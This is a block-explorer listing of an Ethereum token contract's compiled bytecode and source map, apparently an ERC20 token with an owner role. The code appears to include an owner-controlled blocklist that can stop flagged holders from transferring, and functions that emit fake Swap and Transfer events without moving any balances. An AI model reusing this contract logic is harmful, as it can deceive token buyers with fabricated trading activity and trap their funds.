fffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161077191906115a8565b60405180910390a3808061078490611910565b91505061062d565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107e561118a565b6107ef6000611208565b565b60005b8484905081101561095457848482818110610812576108116118e1565b5b9050602002016020810190610827919061164d565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82260008686600060405161088b94939291906119e2565b60405180910390a3600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106108df576108de6118e1565b5b90506020020160208101906108f4919061164d565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161093991906115a8565b60405180910390a3808061094c90611910565b9150506107f4565b505050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546109949061184d565b80601f01602080910402602001604051908101604052809291908181526020018280546109c09061184d565b8015610a0d5780601f106109e257610100808354040283529160200191610a0d565b820191906000526020600020905b8154815290600101906020018083116109f057829003601f168201915b5050505050905090565b610a1f61118a565b60005b82829050811015610abf57600160026000858585818110610a4657610a456118e1565b5b9050602002016020810190610a5b919061164d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610ab790611910565b915050610a22565b505050565b610acc61118a565b80600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610b1b610cb4565b90506000610b298286610baa565b905083811015610b6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6590611a99565b60405180910390fd5b610b7b8286868403610cbc565b60019250505092915050565b600080610b92610cb4565b9050610b9f818585610f11565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c3961118a565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ca8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c9f90611b2b565b60405180910390fd5b610cb181611208565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2290611bbd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9190611c4f565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e7891906115a8565b60405180910390a3505050565b6000610e918484610baa565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610f0b5781811015610efd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef490611cbb565b60405180910390fd5b610f0a8484848403610cbc565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7790611d4d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe690611ddf565b60405180910390fd5b610ffa8383836112cc565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611081576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107890611e71565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161117191906115a8565b60405180910390a36111848484846112d1565b50505050565b611192610cb4565b73ffffffffffffffffffffffffffffffffffffffff166111b061095c565b73ffffffffffffffffffffffffffffffffffffffff1614611206576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111fd90611edd565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806113725750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156113ce5760011515600760009054906101000a900460ff161515146113cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c490611f23565b60405180910390fd5b5b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561140d5780820151818401526020810190506113f2565b60008484015250505050565b6000601f19601f8301169050919050565b6000611435826113d3565b61143f81856113de565b935061144f8185602086016113ef565b61145881611419565b840191505092915050565b6000602082019050818103600083015261147d818461142a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006114ba8261148f565b9050919050565b6114ca816114af565b81146114d557600080fd5b50565b6000813590506114e7816114c1565b92915050565b6000819050919050565b611500816114ed565b811461150b57600080fd5b50565b60008135905061151d816114f7565b92915050565b6000806040838503121561153a57611539611485565b5b6000611548858286016114d8565b92505060206115598582860161150e565b9150509250929050565b60008115159050919050565b61157881611563565b82525050565b6000602082019050611593600083018461156f565b92915050565b6115a2816114ed565b82525050565b60006020820190506115bd6000830184611599565b92915050565b6000806000606084860312156115dc576115db611485565b5b60006115ea868287016114d8565b93505060206115fb868287016114d8565b925050604061160c8682870161150e565b9150509250925092565b600060ff82169050919050565b61162c81611616565b82525050565b60006020820190506116476000830184611623565b92915050565b60006020828403121561166357611662611485565b5b6000611671848285016114d8565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261169f5761169e61167a565b5b8235905067ffffffffffffffff8111156116bc576116bb61167f565b5b6020830191508360208202830111156116d8576116d7611684565b5b9250929050565b600080602083850312156116f6576116f5611485565b5b600083013567ffffffffffffffff8111156117145761171361148a565b5b61172085828601611689565b92509250509250929050565b60008060008060006080868803121561174857611747611485565b5b6000611756888289016114d8565b955050602086013567ffffffffffffffff8111156117775761177661148a565b5b61178388828901611689565b945094505060406117968882890161150e565b92505060606117a78882890161150e565b9150509295509295909350565b6117bd816114af565b82525050565b60006020820190506117d860008301846117b4565b92915050565b600080604083850312156117f5576117f4611485565b5b6000611803858286016114d8565b9250506020611814858286016114d8565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061186557607f821691505b6020821081036118785761187761181e565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006118b8826114ed565b91506118c3836114ed565b92508282019050808211156118db576118da61187e565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061191b826114ed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361194d5761194c61187e565b5b600182019050919050565b6000819050919050565b6000819050919050565b600061198761198261197d84611958565b611962565b6114ed565b9050919050565b6119978161196c565b82525050565b60006080820190506119b26000830187611599565b6119bf602083018661198e565b6119cc604083018561198e565b6119d96060830184611599565b95945050505050565b60006080820190506119f7600083018761198e565b611a046020830186611599565b611a116040830185611599565b611a1e606083018461198e565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611a836025836113de565b9150611a8e82611a27565b604082019050919050565b60006020820190508181036000830152611ab281611a76565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611b156026836113de565b9150611b2082611ab9565b604082019050919050565b60006020820190508181036000830152611b4481611b08565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ba76024836113de565b9150611bb282611b4b565b604082019050919050565b60006020820190508181036000830152611bd681611b9a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c396022836113de565b9150611c4482611bdd565b604082019050919050565b60006020820190508181036000830152611c6881611c2c565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611ca5601d836113de565b9150611cb082611c6f565b602082019050919050565b60006020820190508181036000830152611cd481611c98565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d376025836113de565b9150611d4282611cdb565b604082019050919050565b60006020820190508181036000830152611d6681611d2a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611dc96023836113de565b9150611dd482611d6d565b604082019050919050565b60006020820190508181036000830152611df881611dbc565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e5b6026836113de565b9150611e6682611dff565b604082019050919050565b60006020820190508181036000830152611e8a81611e4e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611ec76020836113de565b9150611ed282611e91565b602082019050919050565b60006020820190508181036000830152611ef681611eba565b9050919050565b50565b6000611f0d6000836113de565b9150611f1882611efd565b600082019050919050565b60006020820190508181036000830152611f3c81611f00565b905091905056fea26469706673582212207d81bb21e8d3138f2249752dca2f8b0059c4cbb57d134516db1babc1dc9c4ca164736f6c63430008100033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad57806397541e9f1161007157806397541e9f14610331578063a457c2d71461034d578063a9059cbb1461037d578063dd62ed3e146103ad578063f2fde38b146103dd5761012c565b8063715018a6146102b357806373ed6b13146102bd5780638da5cb5b146102d957806395d89b41146102f7578063963e1e54146103155761012c565b806332a0e002116100f457806332a0e002146101eb578063395093511461021b5780634bf894411461024b578063618a2f5e1461026757806370a08231146102835761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017f57806323b872dd1461019d578063313ce567146101cd575b600080fd5b6101396103f9565b6040516101469190611463565b60405180910390f35b61016960048036038101906101649190611523565b61048b565b604051610176919061157e565b60405180910390f35b6101876104ae565b60405161019491906115a8565b60405180910390f35b6101b760048036038101906101b291906115c3565b6104b8565b6040516101c4919061157e565b60405180910390f35b6101d56104e7565b6040516101e29190611632565b60405180910390f35b6102056004803603810190610200919061164d565b6104f0565b604051610212919061157e565b60405180910390f35b61023560048036038101906102309190611523565b610546565b604051610242919061157e565b60405180910390f35b610265600480360381019061026091906116df565b61057d565b005b610281600480360381019061027c919061172c565b61062a565b005b61029d6004803603810190610298919061164d565b610794565b6040516102aa91906115a8565b60405180910390f35b6102bb6107dd565b005b6102d760048036038101906102d2919061172c565b6107f1565b005b6102e161095c565b6040516102ee91906117c3565b60405180910390f35b6102ff610985565b60405161030c9190611463565b60405180910390f35b61032f600480360381019061032a91906116df565b610a17565b005b61034b6004803603810190610346919061164d565b610ac4565b005b61036760048036038101906103629190611523565b610b10565b604051610374919061157e565b60405180910390f35b61039760048036038101906103929190611523565b610b87565b6040516103a4919061157e565b60405180910390f35b6103c760048036038101906103c291906117de565b610baa565b6040516103d491906115a8565b60405180910390f35b6103f760048036038101906103f2919061164d565b610c31565b005b6060600580546104089061184d565b80601f01602080910402602001604051908101604052809291908181526020018280546104349061184d565b80156104815780601f1061045657610100808354040283529160200191610481565b820191906000526020600020905b81548152906001019060200180831161046457829003601f168201915b5050505050905090565b600080610496610cb4565b90506104a3818585610cbc565b600191505092915050565b6000600454905090565b6000806104c3610cb4565b90506104d0858285610e85565b6104db858585610f11565b60019150509392505050565b60006012905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600080610551610cb4565b90506105728185856105638589610baa565b61056d91906118ad565b610cbc565b600191505092915050565b61058561118a565b60005b82829050811015610625576000600260008585858181106105ac576105ab6118e1565b5b90506020020160208101906105c1919061164d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061061d90611910565b915050610588565b505050565b60005b8484905081101561078c5784848281811061064b5761064a6118e1565b5b9050602002016020810190610660919061164d565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516106c3949392919061199d565b60405180910390a38484828181106106de576106dd6118e1565b5b90506020020160208101906106f3919061164d565b73ffffffffffffffffffffffffffffffffffffffff16600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161077191906115a8565b60405180910390a3808061078490611910565b91505061062d565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107e561118a565b6107ef6000611208565b565b60005b8484905081101561095457848482818110610812576108116118e1565b5b9050602002016020810190610827919061164d565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82260008686600060405161088b94939291906119e2565b60405180910390a3600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106108df576108de6118e1565b5b90506020020160208101906108f4919061164d565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161093991906115a8565b60405180910390a3808061094c90611910565b9150506107f4565b505050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546109949061184d565b80601f01602080910402602001604051908101604052809291908181526020018280546109c09061184d565b8015610a0d5780601f106109e257610100808354040283529160200191610a0d565b820191906000526020600020905b8154815290600101906020018083116109f057829003601f168201915b5050505050905090565b610a1f61118a565b60005b82829050811015610abf57600160026000858585818110610a4657610a456118e1565b5b9050602002016020810190610a5b919061164d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610ab790611910565b915050610a22565b505050565b610acc61118a565b80600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610b1b610cb4565b90506000610b298286610baa565b905083811015610b6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6590611a99565b60405180910390fd5b610b7b8286868403610cbc565b60019250505092915050565b600080610b92610cb4565b9050610b9f818585610f11565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c3961118a565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610ca8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c9f90611b2b565b60405180910390fd5b610cb181611208565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2290611bbd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9190611c4f565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e7891906115a8565b60405180910390a3505050565b6000610e918484610baa565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610f0b5781811015610efd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef490611cbb565b60405180910390fd5b610f0a8484848403610cbc565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7790611d4d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe690611ddf565b60405180910390fd5b610ffa8383836112cc565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611081576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107890611e71565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161117191906115a8565b60405180910390a36111848484846112d1565b50505050565b611192610cb4565b73ffffffffffffffffffffffffffffffffffffffff166111b061095c565b73ffffffffffffffffffffffffffffffffffffffff1614611206576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111fd90611edd565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806113725750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156113ce5760011515600760009054906101000a900460ff161515146113cd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c490611f23565b60405180910390fd5b5b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561140d5780820151818401526020810190506113f2565b60008484015250505050565b6000601f19601f8301169050919050565b6000611435826113d3565b61143f81856113de565b935061144f8185602086016113ef565b61145881611419565b840191505092915050565b6000602082019050818103600083015261147d818461142a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006114ba8261148f565b9050919050565b6114ca816114af565b81146114d557600080fd5b50565b6000813590506114e7816114c1565b92915050565b6000819050919050565b611500816114ed565b811461150b57600080fd5b50565b60008135905061151d816114f7565b92915050565b6000806040838503121561153a57611539611485565b5b6000611548858286016114d8565b92505060206115598582860161150e565b9150509250929050565b60008115159050919050565b61157881611563565b82525050565b6000602082019050611593600083018461156f565b92915050565b6115a2816114ed565b82525050565b60006020820190506115bd6000830184611599565b92915050565b6000806000606084860312156115dc576115db611485565b5b60006115ea868287016114d8565b93505060206115fb868287016114d8565b925050604061160c8682870161150e565b9150509250925092565b600060ff82169050919050565b61162c81611616565b82525050565b60006020820190506116476000830184611623565b92915050565b60006020828403121561166357611662611485565b5b6000611671848285016114d8565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261169f5761169e61167a565b5b8235905067ffffffffffffffff8111156116bc576116bb61167f565b5b6020830191508360208202830111156116d8576116d7611684565b5b9250929050565b600080602083850312156116f6576116f5611485565b5b600083013567ffffffffffffffff8111156117145761171361148a565b5b61172085828601611689565b92509250509250929050565b60008060008060006080868803121561174857611747611485565b5b6000611756888289016114d8565b955050602086013567ffffffffffffffff8111156117775761177661148a565b5b61178388828901611689565b945094505060406117968882890161150e565b92505060606117a78882890161150e565b9150509295509295909350565b6117bd816114af565b82525050565b60006020820190506117d860008301846117b4565b92915050565b600080604083850312156117f5576117f4611485565b5b6000611803858286016114d8565b9250506020611814858286016114d8565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061186557607f821691505b6020821081036118785761187761181e565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006118b8826114ed565b91506118c3836114ed565b92508282019050808211156118db576118da61187e565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061191b826114ed565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361194d5761194c61187e565b5b600182019050919050565b6000819050919050565b6000819050919050565b600061198761198261197d84611958565b611962565b6114ed565b9050919050565b6119978161196c565b82525050565b60006080820190506119b26000830187611599565b6119bf602083018661198e565b6119cc604083018561198e565b6119d96060830184611599565b95945050505050565b60006080820190506119f7600083018761198e565b611a046020830186611599565b611a116040830185611599565b611a1e606083018461198e565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611a836025836113de565b9150611a8e82611a27565b604082019050919050565b60006020820190508181036000830152611ab281611a76565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611b156026836113de565b9150611b2082611ab9565b604082019050919050565b60006020820190508181036000830152611b4481611b08565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ba76024836113de565b9150611bb282611b4b565b604082019050919050565b60006020820190508181036000830152611bd681611b9a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c396022836113de565b9150611c4482611bdd565b604082019050919050565b60006020820190508181036000830152611c6881611c2c565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611ca5601d836113de565b9150611cb082611c6f565b602082019050919050565b60006020820190508181036000830152611cd481611c98565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611d376025836113de565b9150611d4282611cdb565b604082019050919050565b60006020820190508181036000830152611d6681611d2a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611dc96023836113de565b9150611dd482611d6d565b604082019050919050565b60006020820190508181036000830152611df881611dbc565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e5b6026836113de565b9150611e6682611dff565b604082019050919050565b60006020820190508181036000830152611e8a81611e4e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611ec76020836113de565b9150611ed282611e91565b602082019050919050565b60006020820190508181036000830152611ef681611eba565b9050919050565b50565b6000611f0d6000836113de565b9150611f1882611efd565b600082019050919050565b60006020820190508181036000830152611f3c81611f00565b905091905056fea26469706673582212207d81bb21e8d3138f2249752dca2f8b0059c4cbb57d134516db1babc1dc9c4ca164736f6c63430008100033

Deployed Bytecode Sourcemap

80:135:2:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2252:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5044:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3855:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5803:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3189:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3691:104;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6484:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3487:198;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8910:299;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4019:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2510:101:0;;;:::i;:::-;;9214:300:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1887:85:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2463:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3286:195;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9791:62;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7205:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4340:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4587:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2760:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2252:98:1;2306:13;2338:5;2331:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2252:98;:::o;5044:197::-;5127:4;5143:13;5159:12;:10;:12::i;:::-;5143:28;;5181:32;5190:5;5197:7;5206:6;5181:8;:32::i;:::-;5230:4;5223:11;;;5044:197;;;;:::o;3855:106::-;3916:7;3942:12;;3935:19;;3855:106;:::o;5803:286::-;5930:4;5946:15;5964:12;:10;:12::i;:::-;5946:30;;5986:38;6002:4;6008:7;6017:6;5986:15;:38::i;:::-;6034:27;6044:4;6050:2;6054:6;6034:9;:27::i;:::-;6078:4;6071:11;;;5803:286;;;;;:::o;3189:91::-;3247:5;3271:2;3264:9;;3189:91;:::o;3691:104::-;3748:4;3771:8;:17;3780:7;3771:17;;;;;;;;;;;;;;;;;;;;;;;;;3764:24;;3691:104;;;:::o;6484:234::-;6572:4;6588:13;6604:12;:10;:12::i;:::-;6588:28;;6626:64;6635:5;6642:7;6679:10;6651:25;6661:5;6668:7;6651:9;:25::i;:::-;:38;;;;:::i;:::-;6626:8;:64::i;:::-;6707:4;6700:11;;;6484:234;;;;:::o;3487:198::-;1780:13:0;:11;:13::i;:::-;3578:9:1::1;3573:106;3597:11;;:18;;3593:1;:22;3573:106;;;3663:5;3636:8;:24;3645:11;;3657:1;3645:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;3636:24;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;3617:3;;;;;:::i;:::-;;;;3573:106;;;;3487:198:::0;;:::o;8910:299::-;9027:9;9022:181;9046:11;;:18;;9042:1;:22;9022:181;;;9120:11;;9132:1;9120:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9090:45;;9095:6;9090:45;;;9103:3;9108:1;9111;9114:4;9090:45;;;;;;;;;:::i;:::-;;;;;;;;9171:11;;9183:1;9171:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9154:38;;9163:6;;;;;;;;;;;9154:38;;;9187:4;9154:38;;;;;;:::i;:::-;;;;;;;;9066:3;;;;;:::i;:::-;;;;9022:181;;;;8910:299;;;;;:::o;4019:125::-;4093:7;4119:9;:18;4129:7;4119:18;;;;;;;;;;;;;;;;4112:25;